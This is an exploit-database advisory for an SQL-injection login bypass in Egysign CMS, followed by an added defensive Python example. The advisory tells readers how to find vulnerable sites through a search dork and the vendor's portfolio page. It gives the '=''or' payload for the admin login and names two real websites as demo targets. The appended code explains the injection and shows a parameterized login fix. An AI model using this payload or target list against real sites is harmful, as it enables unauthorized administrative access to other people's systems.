Egysign CMS Authentication Bypass

2015.04.02
Credit: WH!T3 W01F
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title : Egysign CMS Authentication Bypass
# Date : 02/04/2015
# Exploit Author : WH!T3 W01F
# Contact : whit3_w01f@att.net
# Category : Web Application Bugs
# Home : Iran-Cyber.Org - Iran-Cyber.In
# Google Dork : intext:powered By Egysign
# Tested On : Windows

1. Description

By This Vulnerability You Can Bypass Authentication And Get Logged In Like An Admin.

2. Proof Of Concept

You Can Find Targets By 2 Ways :

First Way :

Go To This Address : http://egysign.com/Portfolio.aspx
In That Address Are Many Targets. After You Selected Your Target Use This Exploit :

# http://site.com/admin

Then If The Admin Page Comes, Use These Usernames And Passwords :

Username : '=''or'
Password : '=''or'

Second Way :

Search This Dork : intext:powered By Egysign
Then Use This Exploit :

# http://site.com/admin

Then If The Admin Page Comes, Use These Usernames And Passwords :

Username : '=''or'
Password : '=''or'

# Demo :
# http://diverprofessional.co.uk/admin/
# http://www.injazsys.com/admin/

=========================================

Greetz : | root3r | MOHAMAD_NOFOZI | Sheytan Azzam | KamraN HellisH | JOK3R | Erfan Mig | Alireza_ProMis | Mr.Moein | Pi.Hack | CRYSIS | Siyahi |

Visit Us : Iran-Cyber.Org - Iran-Cyber.In
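Why the '=''or' value is dangerous to a login query built by string concatenation (CWE-89), and a parameterized replacement, as an added example that is not code from the advisory or from Egysign. The query template, table layout and credentials are assumptions made for illustration; whether the injected expression evaluates to true depends on the database engine's comparison rules.

```python
import hashlib
import hmac
import re
import sqlite3

PAYLOAD = "'=''or'"  # the username/password value quoted in the advisory
SALT = b"constructed-demo-salt"  # constructed; use a random per-user salt in practice

# Assumed shape of the vulnerable login query (the CMS source is not on the page).
TEMPLATE = "SELECT id FROM users WHERE username = '{u}' AND password = '{p}'"
STRING_LITERAL = re.compile(r"'(?:[^']|'')*'")


def skeleton(sql):
    """Replace every SQL string literal with '?' so only the code remains."""
    return STRING_LITERAL.sub("?", sql)


def is_injected(username, password):
    """True when the inputs change the statement's structure, not just its data."""
    built = TEMPLATE.format(u=username, p=password)
    return skeleton(built) != skeleton(TEMPLATE.format(u="x", p="x"))


def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw BLOB)")
    conn.execute("INSERT INTO users (username, pw) VALUES (?, ?)",
                 ("admin", pw_hash("constructed-demo-password")))
    return conn


def login(conn, username, password):
    """Hardened login: the username is bound as data, never spliced into SQL."""
    row = conn.execute("SELECT pw FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))


if __name__ == "__main__":
    db = make_db()
    print(skeleton(TEMPLATE.format(u=PAYLOAD, p=PAYLOAD)))
    print(is_injected(PAYLOAD, PAYLOAD), login(db, PAYLOAD, PAYLOAD))
```

The skeleton of the concatenated statement gains `=` and `or` operators that the developer never wrote, while the bound parameter in `login` keeps the same value as plain data.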



Copyright 2024, cxsecurity.com

 
